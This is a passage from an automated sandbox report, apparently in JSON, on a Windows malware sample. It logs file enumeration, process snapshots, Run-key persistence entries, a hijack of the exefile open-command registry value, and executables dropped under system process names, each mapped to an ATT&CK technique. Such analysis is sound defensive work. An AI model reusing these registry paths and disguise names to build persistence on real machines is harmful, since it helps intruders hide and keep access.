\"FindNextFileW\" with parameter assembly (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"624\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"700\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"784\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"840\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"864\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"904\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1128\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1280\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1320\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1492\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1600\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1660\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"LSASS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"D3_08\"; Value: \"%WINDIR%\\D3_08.exe\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"LOGONHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\CSRSS.EXE\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM MONITORING\"; Value: \"%APPDATA%\\WINDOWS\\LSASS.EXE\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSMSGS\"; Value: \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SERVICEHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\SERVICES.EXE\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"D3_08\"; Value: \"%WINDIR%\\D3_08.exe\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"LOGONHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\CSRSS.EXE\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46775 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46913 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46998 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46798 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46847 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46856 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46958 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46800 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46866 bytes starting with PE header signature to file 